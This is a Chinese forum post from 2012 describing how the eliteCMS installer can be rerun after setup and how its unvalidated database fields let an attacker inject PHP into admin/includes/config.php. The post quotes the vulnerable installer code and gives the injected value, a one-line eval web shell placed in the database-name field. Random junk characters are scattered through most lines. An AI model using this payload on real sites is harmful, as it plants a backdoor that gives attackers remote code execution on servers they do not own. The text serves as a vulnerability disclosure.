eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装8 ]" t2 W* ]% W: t1 `7 m
+ @9 j+ \0 J6 t- h另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
0 k4 A' I8 z% I6 X# Z我们来看代码:6 n. G% |9 F5 L: R# z: t
# V% R. x) G: a...7 s- A- J" w/ y/ e- }/ q6 f
elseif ($_GET['step'] == "4") {; c, Z& j, Z% B2 f) C/ J. i2 S& i
$file = "../admin/includes/config.php";; g8 ~/ J) j8 z0 F3 n/ ^
$write = "<?php\n";
4 i. O5 f; ]" \3 ^" S; a $write .= "/**\n";
0 }+ w8 s- }( L" \ z/ T; h $write .= "*\n";1 B3 U3 r" w' I
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
* N; k+ @+ f2 E6 q...略...! j' B+ l4 ~8 H+ O$ C
$write .= "*\n";
3 n0 Z5 o- l' Y1 `2 o7 M; ~ $write .= "*/\n";- s# }; c: E* E: Q
$write .= "\n";
% L4 q, i1 m+ Y7 T7 M $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
5 W( ?; k9 B$ k/ ~ ` $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
( Z# m+ A. j: Y8 |; o( Q5 m5 N $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
" f9 A1 {$ H+ K0 J7 Y# S $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";. b" M) M$ {& U; d9 P3 N
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";9 ?0 z. g& M: e7 _
$write .= "if (!\$connection) {\n";' @ D1 G5 {: j
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$ p6 E+ ?* G9 l5 V( \) U3 q $write .= " \n";. [( f4 T4 B; Z! A2 L
$write .= "} \n";& U% q) U# S6 F6 b* O
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";% o9 h9 g$ y1 W& r9 D
$write .= "if (!\$db_select) {\n";) X! ~4 w: i2 [" A2 x6 a6 S. k4 U: x
$write .= " die(\"Database select failed\" .mysql_error());\n";% \- A7 D8 L1 U8 t! G8 O: I! B
$write .= " \n";4 Y9 S' p- \1 V3 g9 h
$write .= "} \n";
* [6 j! V; g/ I5 } $write .= "?>\n";
5 a1 q# I8 q. x9 i
* I; V+ E' _/ G" Q $writer = fopen($file, 'w');
/ w9 k* i. D/ ?& J...! X9 D1 X; h" }2 g: ?7 D0 M5 x
4 B4 S: E# x( u3 s& n9 j2 Q7 d7 i" X
在看代码:
7 ]0 b/ P: \# D' D4 h# K0 P1 _ M2 T T& K; q. J
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
7 F0 j. d4 m2 L6 B5 {& X% N$_SESSION['DB_NAME'] = $_POST['DB_NAME'];$ l' a. |0 y1 x0 D9 Z, n
$_SESSION['DB_USER'] = $_POST['DB_USER'];3 {9 s5 }; H* m) y3 i
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];3 H- p" X! l$ Y, K2 D' t
: n! Q7 A) ?6 v4 f
取值未作任何验证
+ t" K' O+ J9 ^# x& K如果将数据库名POST数据:
4 T& d9 T: {+ z. S
4 B. ^, {8 V4 G7 H2 R6 c: p"?><?php eval($_POST[c]);?><?php/ O* }" V$ |. o6 l: w% c, [4 |$ g
Q( t' P# F' Y+ k将导致一句话后门写入/admin/includes/config.php; s# P0 K& m5 q; ~1 [9 J
|
发表于 2012-11-18 13:59:27
收藏
支持
反对